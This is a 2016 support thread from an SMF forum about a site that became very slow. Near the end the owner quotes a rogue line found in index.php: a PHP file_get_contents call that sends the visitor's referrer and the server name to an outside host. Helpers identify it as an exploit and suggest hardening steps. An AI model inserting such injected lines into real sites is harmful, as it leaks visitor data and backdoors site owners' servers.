News:

Bored?  Looking to kill some time?  Want to chat with other SMF users?  Join us in IRC chat or Discord

Main Menu

My SMF Forum Now Incredibly Slow

Started by pintosal, March 28, 2016, 12:58:43 PM

Previous topic - Next topic

pintosal

Over the past couple of weeks my SMF has become very slow.

Previously it opened in a couple of second, but now it's down to minutes.

My cpanel provider says there's a problem with index.php, but could not be more specific.

I know practically nothing about php, and would appreciate some guidance.

Sorry to be so vague, but I'm no techie.

Kindred

what is your site URL?

smf version?
mods installed?
Слaва
Украинi

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

Sir Osis of Liver

Ashes and diamonds, foe and friend,
 we were all equal in the end.

- R. Waters

Illori

Quote from: Sir Osis of Liver on March 28, 2016, 01:02:28 PM
Attach your index.php.

i really doubt index.php is the cause of the issue since almost all of SMF goes through that one file.

Sir Osis of Liver

All of the forum is slow.  Sometimes hosts are correct (not often).  Could be a hack.  No harm in looking.

- R. Waters

Shambles

^-- after all that, try ticking "Disable hostname lookups" in the server settings of the ACP. Has been known to improve things in some cases...

JBlaze

Let's hold off on the theories until OP provides us with a link to their site. Then we can diagnose from there :)
Jason Clemons
Former Team Member 2009 - 2012

pintosal

Illori

i see nothing wrong with your index.php file other then you need to upgrade to 2.0.11.

your footer says you are on 2.0.11, but your file does not match that.

a10

Indeed very slow, I'd ask the host (looks like ukwebsolutionsdirect.co.uk) to do some tests into what's going on.
And at the same time, mention this (see attachment) ;O)
2.0.19, php 8.0.23, MariaDB 10.5.15. Mods: Contact Page, Like Posts, Responsive Curve, Search Focus Dropdown, Add Join Date to Post.

Kindred

Quote from: Shambles on March 28, 2016, 01:51:15 PM
try ticking "Disable hostname lookups" in the server settings of the ACP. Has been known to improve things in some cases...
Слaва
Украинi

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

Wellwisher

I did a ping test on ukwebsolutionsdirect.co.uk took 8 seconds to return (site loading after that takes double or even triple that time).  They give UK hosting a bad name. ;D I doubt if it's even running off 32mb ram. It's not an SMF problem.

Jade Elizabeth

It's working fine for me. Did you fix the issue?
Once proud Documentation Writer and Help Squad Leader | Check out my new adult coloring career: Color With Jade/Patreon.

pintosal

For some reason, my index.php had acquired a rogue line, as below, in the body of the file - hacker???

@file_get_contents("[url="http://web.51.la:82/go.asp?svid=15&id=18776897&referrer=".$_SERVER['HTTP_REFERER'%5D."&vpage=http://".$_SERVER['SERVER_NAME'%5D."/indexs.php""]http://web.51.la:82/go.asp?svid=15&id=18776897&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/indexs.php"[/url]);

The support team at the ISP spotted it and commented it out, and now all is well.

As I'm not at all conversant with php I don't know what it was doing.

Thanks for your help

Colin

Yes this is an exploit. You should spend some time securing your SMF installation and the server so this doesn't come  back.

Also, if anyone is interested:

http://security.stackexchange.com/questions/66729/what-does-this-javascript-file-do-is-this-a-virus
"If everybody is thinking alike, then somebody is not thinking." - Gen. George S. Patton Jr.

Colin

pintosal

Thanks Colin

My cpanel account password is pretty secure, so I'm wondering how anyone could have hacked my account.

There is nothing I can do about the server, as this is under the ISP's control. But what can I do to improve security, especially of the SMF?

Kindred

SMF is secure. There are no known vulnerabilities in 2.0.11

That being said...  although we try to check every mod submitted here - mods add code which could, potentially be vulnerable.
Additional scripts running on your site could be vulnerable.

Your best option, in general, is to have your files chmod to 644 and your directories to 755.
Слaва
Украинi

pintosal

I have no mods.

The attached file shows my current permissions

Kindred

Then the hacker either got in through another script running on your site or through some poorly configured other site on your host/server
Слaва
Украинi

Sir Osis of Liver

That code is not in the index.php you attached.  As Illori pointed out, that's a 2.0.10 file in a 2.0.11 install.  Have you checked your FTP users in cpanel and changed FTP passwords?

- R. Waters

Advertisement: